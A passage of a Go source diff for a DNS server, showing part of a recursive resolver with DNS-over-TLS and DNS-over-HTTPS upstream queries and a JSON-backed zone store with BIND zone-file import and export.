ModeDoT // DNS-over-TLS (port 853)
|
||||
ModeDoH // DNS-over-HTTPS (RFC 8484)
|
||||
)
|
||||
|
||||
// RecursiveResolver performs iterative DNS resolution from root hints.
|
||||
type RecursiveResolver struct {
|
||||
// NS cache: zone -> list of nameserver IPs
|
||||
nsCache map[string][]string
|
||||
nsCacheMu sync.RWMutex
|
||||
|
||||
client *dns.Client
|
||||
dotClient *dns.Client // TLS client for DoT
|
||||
dohHTTP *http.Client
|
||||
maxDepth int
|
||||
timeout time.Duration
|
||||
|
||||
// Encryption settings
|
||||
EnableDoT bool
|
||||
EnableDoH bool
|
||||
}
|
||||
|
||||
// NewRecursiveResolver creates a resolver with root hints.
|
||||
func NewRecursiveResolver() *RecursiveResolver {
|
||||
return &RecursiveResolver{
|
||||
nsCache: make(map[string][]string),
|
||||
client: &dns.Client{Timeout: 4 * time.Second},
|
||||
dotClient: &dns.Client{
|
||||
Net: "tcp-tls",
|
||||
Timeout: 5 * time.Second,
|
||||
TLSConfig: &tls.Config{
|
||||
MinVersion: tls.VersionTLS12,
|
||||
},
|
||||
},
|
||||
dohHTTP: &http.Client{
|
||||
Timeout: 5 * time.Second,
|
||||
Transport: &http.Transport{
|
||||
TLSClientConfig: &tls.Config{
|
||||
MinVersion: tls.VersionTLS12,
|
||||
},
|
||||
MaxIdleConns: 10,
|
||||
IdleConnTimeout: 30 * time.Second,
|
||||
DisableCompression: false,
|
||||
ForceAttemptHTTP2: true,
|
||||
},
|
||||
},
|
||||
maxDepth: 20,
|
||||
timeout: 4 * time.Second,
|
||||
}
|
||||
}
|
||||
|
||||
// Resolve performs full iterative resolution for the given query message.
|
||||
// Returns the final authoritative response, or nil on failure.
|
||||
func (rr *RecursiveResolver) Resolve(req *dns.Msg) *dns.Msg {
|
||||
if len(req.Question) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
q := req.Question[0]
|
||||
return rr.resolve(q.Name, q.Qtype, 0)
|
||||
}
|
||||
|
||||
func (rr *RecursiveResolver) resolve(name string, qtype uint16, depth int) *dns.Msg {
|
||||
if depth >= rr.maxDepth {
|
||||
log.Printf("[resolver] max depth reached for %s", name)
|
||||
return nil
|
||||
}
|
||||
|
||||
name = dns.Fqdn(name)
|
||||
|
||||
// Find the best nameservers to start from.
|
||||
// Walk up the name to find cached NS records, fall back to root.
|
||||
nameservers := rr.findBestNS(name)
|
||||
|
||||
// Iterative resolution: keep querying NS servers until we get an answer
|
||||
for i := 0; i < rr.maxDepth; i++ {
|
||||
resp := rr.queryServers(nameservers, name, qtype)
|
||||
if resp == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
// Got an authoritative answer or a final answer with records
|
||||
if resp.Authoritative && len(resp.Answer) > 0 {
|
||||
return resp
|
||||
}
|
||||
|
||||
// Check if answer section has what we want (non-authoritative but valid)
|
||||
if len(resp.Answer) > 0 {
|
||||
hasTarget := false
|
||||
var cnameRR *dns.CNAME
|
||||
for _, ans := range resp.Answer {
|
||||
if ans.Header().Rrtype == qtype {
|
||||
hasTarget = true
|
||||
}
|
||||
if cn, ok := ans.(*dns.CNAME); ok && qtype != dns.TypeCNAME {
|
||||
cnameRR = cn
|
||||
}
|
||||
}
|
||||
if hasTarget {
|
||||
return resp
|
||||
}
|
||||
// Follow CNAME chain
|
||||
if cnameRR != nil {
|
||||
cResp := rr.resolve(cnameRR.Target, qtype, depth+1)
|
||||
if cResp != nil {
|
||||
// Prepend the CNAME to the answer
|
||||
cResp.Answer = append([]dns.RR{cnameRR}, cResp.Answer...)
|
||||
return cResp
|
||||
}
|
||||
}
|
||||
return resp
|
||||
}
|
||||
|
||||
// NXDOMAIN — name doesn't exist
|
||||
if resp.Rcode == dns.RcodeNameError {
|
||||
return resp
|
||||
}
|
||||
|
||||
// NOERROR with no answer and no NS in authority = we're done
|
||||
if len(resp.Ns) == 0 && len(resp.Answer) == 0 {
|
||||
return resp
|
||||
}
|
||||
|
||||
// Referral: extract NS records from authority section
|
||||
var newNS []string
|
||||
var nsNames []string
|
||||
for _, rr := range resp.Ns {
|
||||
if ns, ok := rr.(*dns.NS); ok {
|
||||
nsNames = append(nsNames, ns.Ns)
|
||||
}
|
||||
}
|
||||
|
||||
if len(nsNames) == 0 {
|
||||
// SOA in authority = negative response from authoritative server
|
||||
for _, rr := range resp.Ns {
|
||||
if _, ok := rr.(*dns.SOA); ok {
|
||||
return resp
|
||||
}
|
||||
}
|
||||
return resp
|
||||
}
|
||||
|
||||
// Try to get IPs from the additional section (glue records)
|
||||
glue := make(map[string]string)
|
||||
for _, rr := range resp.Extra {
|
||||
if a, ok := rr.(*dns.A); ok {
|
||||
glue[strings.ToLower(a.Hdr.Name)] = a.A.String() + ":53"
|
||||
}
|
||||
}
|
||||
|
||||
for _, nsName := range nsNames {
|
||||
key := strings.ToLower(dns.Fqdn(nsName))
|
||||
if ip, ok := glue[key]; ok {
|
||||
newNS = append(newNS, ip)
|
||||
}
|
||||
}
|
||||
|
||||
// If no glue, resolve NS names ourselves
|
||||
if len(newNS) == 0 {
|
||||
for _, nsName := range nsNames {
|
||||
ips := rr.resolveNSName(nsName, depth+1)
|
||||
newNS = append(newNS, ips...)
|
||||
if len(newNS) >= 3 {
|
||||
break // Enough NS IPs
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if len(newNS) == 0 {
|
||||
log.Printf("[resolver] no NS IPs found for delegation of %s", name)
|
||||
return nil
|
||||
}
|
||||
|
||||
// Cache the delegation
|
||||
zone := extractZone(resp.Ns)
|
||||
if zone != "" {
|
||||
rr.cacheNS(zone, newNS)
|
||||
}
|
||||
|
||||
nameservers = newNS
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// resolveNSName resolves a nameserver hostname to its IP(s).
|
||||
func (rr *RecursiveResolver) resolveNSName(nsName string, depth int) []string {
|
||||
resp := rr.resolve(nsName, dns.TypeA, depth)
|
||||
if resp == nil {
|
||||
return nil
|
||||
}
|
||||
var ips []string
|
||||
for _, ans := range resp.Answer {
|
||||
if a, ok := ans.(*dns.A); ok {
|
||||
ips = append(ips, a.A.String()+":53")
|
||||
}
|
||||
}
|
||||
return ips
|
||||
}
|
||||
|
||||
// queryServers sends a query to a list of nameservers, returns first valid response.
|
||||
func (rr *RecursiveResolver) queryServers(servers []string, name string, qtype uint16) *dns.Msg {
|
||||
msg := new(dns.Msg)
|
||||
msg.SetQuestion(dns.Fqdn(name), qtype)
|
||||
msg.RecursionDesired = false // We're doing iterative resolution
|
||||
|
||||
for _, server := range servers {
|
||||
resp, _, err := rr.client.Exchange(msg, server)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if resp != nil {
|
||||
return resp
|
||||
}
|
||||
}
|
||||
|
||||
// Retry with TCP for truncated responses
|
||||
msg.RecursionDesired = false
|
||||
tcpClient := &dns.Client{Net: "tcp", Timeout: rr.timeout}
|
||||
for _, server := range servers {
|
||||
resp, _, err := tcpClient.Exchange(msg, server)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if resp != nil {
|
||||
return resp
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// queryUpstreamDoT sends a query to an upstream server via DNS-over-TLS (port 853).
|
||||
func (rr *RecursiveResolver) QueryUpstreamDoT(req *dns.Msg, server string) (*dns.Msg, error) {
|
||||
// Extract IP from server address (may include :53)
|
||||
ip := server
|
||||
if idx := strings.LastIndex(ip, ":"); idx >= 0 {
|
||||
ip = ip[:idx]
|
||||
}
|
||||
|
||||
// Get TLS server name for certificate validation
|
||||
serverName, ok := knownDoTServers[ip]
|
||||
if !ok {
|
||||
serverName = ip // Use IP as fallback (less secure, but works)
|
||||
}
|
||||
|
||||
dotAddr := ip + ":853"
|
||||
client := &dns.Client{
|
||||
Net: "tcp-tls",
|
||||
Timeout: 5 * time.Second,
|
||||
TLSConfig: &tls.Config{
|
||||
ServerName: serverName,
|
||||
MinVersion: tls.VersionTLS12,
|
||||
},
|
||||
}
|
||||
|
||||
msg := req.Copy()
|
||||
msg.RecursionDesired = true
|
||||
|
||||
resp, _, err := client.Exchange(msg, dotAddr)
|
||||
return resp, err
|
||||
}
|
||||
|
||||
// queryUpstreamDoH sends a query to an upstream server via DNS-over-HTTPS (RFC 8484).
|
||||
func (rr *RecursiveResolver) QueryUpstreamDoH(req *dns.Msg, server string) (*dns.Msg, error) {
|
||||
// Extract IP from server address
|
||||
ip := server
|
||||
if idx := strings.LastIndex(ip, ":"); idx >= 0 {
|
||||
ip = ip[:idx]
|
||||
}
|
||||
|
||||
// Find the DoH endpoint URL
|
||||
endpoint, ok := knownDoHEndpoints[ip]
|
||||
if !ok {
|
||||
return nil, fmt.Errorf("no DoH endpoint known for %s", ip)
|
||||
}
|
||||
|
||||
// Encode DNS message as wire format
|
||||
msg := req.Copy()
|
||||
msg.RecursionDesired = true
|
||||
wireMsg, err := msg.Pack()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("pack DNS message: %w", err)
|
||||
}
|
||||
|
||||
// POST as application/dns-message (RFC 8484)
|
||||
httpReq, err := http.NewRequest("POST", endpoint, bytes.NewReader(wireMsg))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("create HTTP request: %w", err)
|
||||
}
|
||||
httpReq.Header.Set("Content-Type", "application/dns-message")
|
||||
httpReq.Header.Set("Accept", "application/dns-message")
|
||||
|
||||
httpResp, err := rr.dohHTTP.Do(httpReq)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("DoH request to %s: %w", endpoint, err)
|
||||
}
|
||||
defer httpResp.Body.Close()
|
||||
|
||||
if httpResp.StatusCode != http.StatusOK {
|
||||
return nil, fmt.Errorf("DoH response status %d from %s", httpResp.StatusCode, endpoint)
|
||||
}
|
||||
|
||||
body, err := io.ReadAll(httpResp.Body)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read DoH response: %w", err)
|
||||
}
|
||||
|
||||
resp := new(dns.Msg)
|
||||
if err := resp.Unpack(body); err != nil {
|
||||
return nil, fmt.Errorf("unpack DoH response: %w", err)
|
||||
}
|
||||
|
||||
return resp, nil
|
||||
}
|
||||
|
||||
// queryUpstreamEncrypted tries DoH first (if enabled), then DoT, then plain.
|
||||
func (rr *RecursiveResolver) queryUpstreamEncrypted(req *dns.Msg, server string) (*dns.Msg, string, error) {
|
||||
ip := server
|
||||
if idx := strings.LastIndex(ip, ":"); idx >= 0 {
|
||||
ip = ip[:idx]
|
||||
}
|
||||
|
||||
// Try DoH if enabled and we know the endpoint
|
||||
if rr.EnableDoH {
|
||||
if _, ok := knownDoHEndpoints[ip]; ok {
|
||||
resp, err := rr.QueryUpstreamDoH(req, server)
|
||||
if err == nil && resp != nil {
|
||||
return resp, "doh", nil
|
||||
}
|
||||
log.Printf("[resolver] DoH failed for %s: %v, falling back", ip, err)
|
||||
}
|
||||
}
|
||||
|
||||
// Try DoT if enabled
|
||||
if rr.EnableDoT {
|
||||
resp, err := rr.QueryUpstreamDoT(req, server)
|
||||
if err == nil && resp != nil {
|
||||
return resp, "dot", nil
|
||||
}
|
||||
log.Printf("[resolver] DoT failed for %s: %v, falling back", ip, err)
|
||||
}
|
||||
|
||||
// Plain DNS fallback
|
||||
c := &dns.Client{Timeout: 5 * time.Second}
|
||||
resp, _, err := c.Exchange(req, server)
|
||||
if err != nil {
|
||||
return nil, "plain", err
|
||||
}
|
||||
return resp, "plain", nil
|
||||
}
|
||||
|
||||
// findBestNS finds the closest cached NS for the given name, or returns root servers.
|
||||
func (rr *RecursiveResolver) findBestNS(name string) []string {
|
||||
rr.nsCacheMu.RLock()
|
||||
defer rr.nsCacheMu.RUnlock()
|
||||
|
||||
// Walk up the domain name
|
||||
labels := dns.SplitDomainName(name)
|
||||
for i := 0; i < len(labels); i++ {
|
||||
zone := dns.Fqdn(strings.Join(labels[i:], "."))
|
||||
if ns, ok := rr.nsCache[zone]; ok && len(ns) > 0 {
|
||||
return ns
|
||||
}
|
||||
}
|
||||
|
||||
return rootServers
|
||||
}
|
||||
|
||||
// cacheNS stores nameserver IPs for a zone.
|
||||
func (rr *RecursiveResolver) cacheNS(zone string, servers []string) {
|
||||
rr.nsCacheMu.Lock()
|
||||
rr.nsCache[dns.Fqdn(zone)] = servers
|
||||
rr.nsCacheMu.Unlock()
|
||||
}
|
||||
|
||||
// extractZone gets the zone name from NS authority records.
|
||||
func extractZone(ns []dns.RR) string {
|
||||
for _, rr := range ns {
|
||||
if nsRR, ok := rr.(*dns.NS); ok {
|
||||
return nsRR.Hdr.Name
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// ResolveWithFallback tries recursive resolution, falls back to upstream forwarders.
|
||||
// Now with DoT/DoH encryption support for upstream queries.
|
||||
func (rr *RecursiveResolver) ResolveWithFallback(req *dns.Msg, upstream []string) *dns.Msg {
|
||||
// Try full recursive first
|
||||
resp := rr.Resolve(req)
|
||||
if resp != nil && resp.Rcode != dns.RcodeServerFailure {
|
||||
return resp
|
||||
}
|
||||
|
||||
// Fallback to upstream forwarders if configured — use encrypted transport
|
||||
if len(upstream) > 0 {
|
||||
for _, us := range upstream {
|
||||
resp, mode, err := rr.queryUpstreamEncrypted(req, us)
|
||||
if err == nil && resp != nil {
|
||||
if mode != "plain" {
|
||||
log.Printf("[resolver] upstream %s answered via %s", us, mode)
|
||||
}
|
||||
return resp
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return resp
|
||||
}
|
||||
|
||||
// GetEncryptionStatus returns the current encryption mode info.
|
||||
func (rr *RecursiveResolver) GetEncryptionStatus() map[string]interface{} {
|
||||
status := map[string]interface{}{
|
||||
"dot_enabled": rr.EnableDoT,
|
||||
"doh_enabled": rr.EnableDoH,
|
||||
"dot_servers": knownDoTServers,
|
||||
"doh_servers": knownDoHEndpoints,
|
||||
}
|
||||
if rr.EnableDoH {
|
||||
status["preferred_mode"] = "doh"
|
||||
} else if rr.EnableDoT {
|
||||
status["preferred_mode"] = "dot"
|
||||
} else {
|
||||
status["preferred_mode"] = "plain"
|
||||
}
|
||||
return status
|
||||
}
|
||||
|
||||
// FlushNSCache clears all cached NS delegations.
|
||||
func (rr *RecursiveResolver) FlushNSCache() {
|
||||
rr.nsCacheMu.Lock()
|
||||
rr.nsCache = make(map[string][]string)
|
||||
rr.nsCacheMu.Unlock()
|
||||
}
|
||||
|
||||
// GetNSCache returns a copy of the NS delegation cache.
|
||||
func (rr *RecursiveResolver) GetNSCache() map[string][]string {
|
||||
rr.nsCacheMu.RLock()
|
||||
defer rr.nsCacheMu.RUnlock()
|
||||
result := make(map[string][]string, len(rr.nsCache))
|
||||
for k, v := range rr.nsCache {
|
||||
cp := make([]string, len(v))
|
||||
copy(cp, v)
|
||||
result[k] = cp
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// String returns resolver info for debugging.
|
||||
func (rr *RecursiveResolver) String() string {
|
||||
rr.nsCacheMu.RLock()
|
||||
defer rr.nsCacheMu.RUnlock()
|
||||
mode := "plain"
|
||||
if rr.EnableDoH {
|
||||
mode = "DoH"
|
||||
} else if rr.EnableDoT {
|
||||
mode = "DoT"
|
||||
}
|
||||
return fmt.Sprintf("RecursiveResolver{cached_zones=%d, max_depth=%d, mode=%s}", len(rr.nsCache), rr.maxDepth, mode)
|
||||
}
|
||||
525
services/dns-server/server/zones.go
Normal file
525
services/dns-server/server/zones.go
Normal file
@ -0,0 +1,525 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// RecordType represents supported DNS record types.
|
||||
type RecordType string
|
||||
|
||||
const (
|
||||
TypeA RecordType = "A"
|
||||
TypeAAAA RecordType = "AAAA"
|
||||
TypeCNAME RecordType = "CNAME"
|
||||
TypeMX RecordType = "MX"
|
||||
TypeTXT RecordType = "TXT"
|
||||
TypeNS RecordType = "NS"
|
||||
TypeSRV RecordType = "SRV"
|
||||
TypePTR RecordType = "PTR"
|
||||
TypeSOA RecordType = "SOA"
|
||||
)
|
||||
|
||||
// Record is a single DNS record.
|
||||
type Record struct {
|
||||
ID string `json:"id"`
|
||||
Type RecordType `json:"type"`
|
||||
Name string `json:"name"`
|
||||
Value string `json:"value"`
|
||||
TTL uint32 `json:"ttl"`
|
||||
Priority uint16 `json:"priority,omitempty"` // MX, SRV
|
||||
Weight uint16 `json:"weight,omitempty"` // SRV
|
||||
Port uint16 `json:"port,omitempty"` // SRV
|
||||
}
|
||||
|
||||
// Zone represents a DNS zone with its records.
|
||||
type Zone struct {
|
||||
Domain string `json:"domain"`
|
||||
SOA SOARecord `json:"soa"`
|
||||
Records []Record `json:"records"`
|
||||
DNSSEC bool `json:"dnssec"`
|
||||
CreatedAt string `json:"created_at"`
|
||||
UpdatedAt string `json:"updated_at"`
|
||||
}
|
||||
|
||||
// SOARecord holds SOA-specific fields.
|
||||
type SOARecord struct {
|
||||
PrimaryNS string `json:"primary_ns"`
|
||||
AdminEmail string `json:"admin_email"`
|
||||
Serial uint32 `json:"serial"`
|
||||
Refresh uint32 `json:"refresh"`
|
||||
Retry uint32 `json:"retry"`
|
||||
Expire uint32 `json:"expire"`
|
||||
MinTTL uint32 `json:"min_ttl"`
|
||||
}
|
||||
|
||||
// ZoneStore manages zones on disk and in memory.
|
||||
type ZoneStore struct {
|
||||
mu sync.RWMutex
|
||||
zones map[string]*Zone
|
||||
zonesDir string
|
||||
}
|
||||
|
||||
// NewZoneStore creates a store backed by a directory.
|
||||
func NewZoneStore(dir string) *ZoneStore {
|
||||
os.MkdirAll(dir, 0755)
|
||||
return &ZoneStore{
|
||||
zones: make(map[string]*Zone),
|
||||
zonesDir: dir,
|
||||
}
|
||||
}
|
||||
|
||||
// LoadAll reads all zone files from disk.
|
||||
func (s *ZoneStore) LoadAll() error {
|
||||
entries, err := os.ReadDir(s.zonesDir)
|
||||
if err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
return nil
|
||||
}
|
||||
return err
|
||||
}
|
||||
for _, e := range entries {
|
||||
if filepath.Ext(e.Name()) != ".json" {
|
||||
continue
|
||||
}
|
||||
data, err := os.ReadFile(filepath.Join(s.zonesDir, e.Name()))
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
var z Zone
|
||||
if err := json.Unmarshal(data, &z); err != nil {
|
||||
continue
|
||||
}
|
||||
s.zones[dns.Fqdn(z.Domain)] = &z
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Save writes a zone to disk.
|
||||
func (s *ZoneStore) Save(z *Zone) error {
|
||||
z.UpdatedAt = time.Now().UTC().Format(time.RFC3339)
|
||||
data, err := json.MarshalIndent(z, "", " ")
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
fname := filepath.Join(s.zonesDir, z.Domain+".json")
|
||||
return os.WriteFile(fname, data, 0644)
|
||||
}
|
||||
|
||||
// Get returns a zone by domain.
|
||||
func (s *ZoneStore) Get(domain string) *Zone {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
return s.zones[dns.Fqdn(domain)]
|
||||
}
|
||||
|
||||
// List returns all zones.
|
||||
func (s *ZoneStore) List() []*Zone {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
result := make([]*Zone, 0, len(s.zones))
|
||||
for _, z := range s.zones {
|
||||
result = append(result, z)
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// Create adds a new zone.
|
||||
func (s *ZoneStore) Create(domain string) (*Zone, error) {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
if _, exists := s.zones[fqdn]; exists {
|
||||
return nil, fmt.Errorf("zone %s already exists", domain)
|
||||
}
|
||||
|
||||
now := time.Now().UTC().Format(time.RFC3339)
|
||||
z := &Zone{
|
||||
Domain: domain,
|
||||
SOA: SOARecord{
|
||||
PrimaryNS: "ns1." + domain,
|
||||
AdminEmail: "admin." + domain,
|
||||
Serial: uint32(time.Now().Unix()),
|
||||
Refresh: 3600,
|
||||
Retry: 600,
|
||||
Expire: 86400,
|
||||
MinTTL: 300,
|
||||
},
|
||||
Records: []Record{
|
||||
{ID: "ns1", Type: TypeNS, Name: domain + ".", Value: "ns1." + domain + ".", TTL: 3600},
|
||||
},
|
||||
CreatedAt: now,
|
||||
UpdatedAt: now,
|
||||
}
|
||||
s.zones[fqdn] = z
|
||||
return z, s.Save(z)
|
||||
}
|
||||
|
||||
// Delete removes a zone.
|
||||
func (s *ZoneStore) Delete(domain string) error {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
if _, exists := s.zones[fqdn]; !exists {
|
||||
return fmt.Errorf("zone %s not found", domain)
|
||||
}
|
||||
delete(s.zones, fqdn)
|
||||
fname := filepath.Join(s.zonesDir, domain+".json")
|
||||
os.Remove(fname)
|
||||
return nil
|
||||
}
|
||||
|
||||
// AddRecord adds a record to a zone.
|
||||
func (s *ZoneStore) AddRecord(domain string, rec Record) error {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
z, ok := s.zones[fqdn]
|
||||
if !ok {
|
||||
return fmt.Errorf("zone %s not found", domain)
|
||||
}
|
||||
|
||||
if rec.ID == "" {
|
||||
rec.ID = fmt.Sprintf("r%d", time.Now().UnixNano())
|
||||
}
|
||||
if rec.TTL == 0 {
|
||||
rec.TTL = 300
|
||||
}
|
||||
|
||||
z.Records = append(z.Records, rec)
|
||||
z.SOA.Serial++
|
||||
return s.Save(z)
|
||||
}
|
||||
|
||||
// DeleteRecord removes a record by ID.
|
||||
func (s *ZoneStore) DeleteRecord(domain, recordID string) error {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
z, ok := s.zones[fqdn]
|
||||
if !ok {
|
||||
return fmt.Errorf("zone %s not found", domain)
|
||||
}
|
||||
|
||||
for i, r := range z.Records {
|
||||
if r.ID == recordID {
|
||||
z.Records = append(z.Records[:i], z.Records[i+1:]...)
|
||||
z.SOA.Serial++
|
||||
return s.Save(z)
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("record %s not found", recordID)
|
||||
}
|
||||
|
||||
// UpdateRecord updates a record by ID.
|
||||
func (s *ZoneStore) UpdateRecord(domain, recordID string, rec Record) error {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
z, ok := s.zones[fqdn]
|
||||
if !ok {
|
||||
return fmt.Errorf("zone %s not found", domain)
|
||||
}
|
||||
|
||||
for i, r := range z.Records {
|
||||
if r.ID == recordID {
|
||||
rec.ID = recordID
|
||||
z.Records[i] = rec
|
||||
z.SOA.Serial++
|
||||
return s.Save(z)
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("record %s not found", recordID)
|
||||
}
|
||||
|
||||
// Lookup finds records matching a query name and type within all zones.
|
||||
func (s *ZoneStore) Lookup(name string, qtype uint16) []dns.RR {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
|
||||
fqdn := dns.Fqdn(name)
|
||||
var results []dns.RR
|
||||
|
||||
// Find the zone for this name
|
||||
for zoneDomain, z := range s.zones {
|
||||
if !dns.IsSubDomain(zoneDomain, fqdn) {
|
||||
continue
|
||||
}
|
||||
// Check records
|
||||
for _, rec := range z.Records {
|
||||
recFQDN := dns.Fqdn(rec.Name)
|
||||
if recFQDN != fqdn {
|
||||
continue
|
||||
}
|
||||
if rr := recordToRR(rec, fqdn); rr != nil {
|
||||
if qtype == dns.TypeANY || rr.Header().Rrtype == qtype {
|
||||
results = append(results, rr)
|
||||
}
|
||||
}
|
||||
}
|
||||
// SOA for zone apex
|
||||
if fqdn == zoneDomain && (qtype == dns.TypeSOA || qtype == dns.TypeANY) {
|
||||
soa := &dns.SOA{
|
||||
Hdr: dns.RR_Header{Name: zoneDomain, Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: z.SOA.MinTTL},
|
||||
Ns: dns.Fqdn(z.SOA.PrimaryNS),
|
||||
Mbox: dns.Fqdn(z.SOA.AdminEmail),
|
||||
Serial: z.SOA.Serial,
|
||||
Refresh: z.SOA.Refresh,
|
||||
Retry: z.SOA.Retry,
|
||||
Expire: z.SOA.Expire,
|
||||
Minttl: z.SOA.MinTTL,
|
||||
}
|
||||
results = append(results, soa)
|
||||
}
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
func recordToRR(rec Record, fqdn string) dns.RR {
|
||||
hdr := dns.RR_Header{Name: fqdn, Class: dns.ClassINET, Ttl: rec.TTL}
|
||||
|
||||
switch rec.Type {
|
||||
case TypeA:
|
||||
hdr.Rrtype = dns.TypeA
|
||||
rr := &dns.A{Hdr: hdr}
|
||||
rr.A = parseIP(rec.Value)
|
||||
if rr.A == nil {
|
||||
return nil
|
||||
}
|
||||
return rr
|
||||
case TypeAAAA:
|
||||
hdr.Rrtype = dns.TypeAAAA
|
||||
rr := &dns.AAAA{Hdr: hdr}
|
||||
rr.AAAA = parseIP(rec.Value)
|
||||
if rr.AAAA == nil {
|
||||
return nil
|
||||
}
|
||||
return rr
|
||||
case TypeCNAME:
|
||||
hdr.Rrtype = dns.TypeCNAME
|
||||
return &dns.CNAME{Hdr: hdr, Target: dns.Fqdn(rec.Value)}
|
||||
case TypeMX:
|
||||
hdr.Rrtype = dns.TypeMX
|
||||
return &dns.MX{Hdr: hdr, Preference: rec.Priority, Mx: dns.Fqdn(rec.Value)}
|
||||
case TypeTXT:
|
||||
hdr.Rrtype = dns.TypeTXT
|
||||
return &dns.TXT{Hdr: hdr, Txt: []string{rec.Value}}
|
||||
case TypeNS:
|
||||
hdr.Rrtype = dns.TypeNS
|
||||
return &dns.NS{Hdr: hdr, Ns: dns.Fqdn(rec.Value)}
|
||||
case TypeSRV:
|
||||
hdr.Rrtype = dns.TypeSRV
|
||||
return &dns.SRV{Hdr: hdr, Priority: rec.Priority, Weight: rec.Weight, Port: rec.Port, Target: dns.Fqdn(rec.Value)}
|
||||
case TypePTR:
|
||||
hdr.Rrtype = dns.TypePTR
|
||||
return &dns.PTR{Hdr: hdr, Ptr: dns.Fqdn(rec.Value)}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func parseIP(s string) net.IP {
|
||||
return net.ParseIP(s)
|
||||
}
|
||||
|
||||
// ExportZoneFile exports a zone in BIND zone file format.
|
||||
func (s *ZoneStore) ExportZoneFile(domain string) (string, error) {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
|
||||
z, ok := s.zones[dns.Fqdn(domain)]
|
||||
if !ok {
|
||||
return "", fmt.Errorf("zone %s not found", domain)
|
||||
}
|
||||
|
||||
var b strings.Builder
|
||||
b.WriteString(fmt.Sprintf("; Zone file for %s\n", z.Domain))
|
||||
b.WriteString(fmt.Sprintf("; Exported at %s\n", time.Now().UTC().Format(time.RFC3339)))
|
||||
b.WriteString(fmt.Sprintf("$ORIGIN %s.\n", z.Domain))
|
||||
b.WriteString(fmt.Sprintf("$TTL %d\n\n", z.SOA.MinTTL))
|
||||
|
||||
// SOA
|
||||
b.WriteString(fmt.Sprintf("@ IN SOA %s. %s. (\n", z.SOA.PrimaryNS, z.SOA.AdminEmail))
|
||||
b.WriteString(fmt.Sprintf(" %d ; serial\n", z.SOA.Serial))
|
||||
b.WriteString(fmt.Sprintf(" %d ; refresh\n", z.SOA.Refresh))
|
||||
b.WriteString(fmt.Sprintf(" %d ; retry\n", z.SOA.Retry))
|
||||
b.WriteString(fmt.Sprintf(" %d ; expire\n", z.SOA.Expire))
|
||||
b.WriteString(fmt.Sprintf(" %d ; minimum TTL\n)\n\n", z.SOA.MinTTL))
|
||||
|
||||
// Records grouped by type
|
||||
for _, rec := range z.Records {
|
||||
name := rec.Name
|
||||
// Make relative to origin
|
||||
suffix := "." + z.Domain + "."
|
||||
if strings.HasSuffix(name, suffix) {
|
||||
name = strings.TrimSuffix(name, suffix)
|
||||
} else if name == z.Domain+"." {
|
||||
name = "@"
|
||||
}
|
||||
|
||||
switch rec.Type {
|
||||
case TypeMX:
|
||||
b.WriteString(fmt.Sprintf("%-24s %d IN MX %d %s\n", name, rec.TTL, rec.Priority, rec.Value))
|
||||
case TypeSRV:
|
||||
b.WriteString(fmt.Sprintf("%-24s %d IN SRV %d %d %d %s\n", name, rec.TTL, rec.Priority, rec.Weight, rec.Port, rec.Value))
|
||||
default:
|
||||
b.WriteString(fmt.Sprintf("%-24s %d IN %-6s %s\n", name, rec.TTL, rec.Type, rec.Value))
|
||||
}
|
||||
}
|
||||
|
||||
return b.String(), nil
|
||||
}
|
||||
|
||||
// ImportZoneFile parses a BIND-style zone file and adds records.
|
||||
// Returns number of records added.
|
||||
func (s *ZoneStore) ImportZoneFile(domain, content string) (int, error) {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
z, ok := s.zones[fqdn]
|
||||
if !ok {
|
||||
return 0, fmt.Errorf("zone %s not found — create it first", domain)
|
||||
}
|
||||
|
||||
added := 0
|
||||
zp := dns.NewZoneParser(strings.NewReader(content), dns.Fqdn(domain), "")
|
||||
for rr, ok := zp.Next(); ok; rr, ok = zp.Next() {
|
||||
hdr := rr.Header()
|
||||
rec := Record{
|
||||
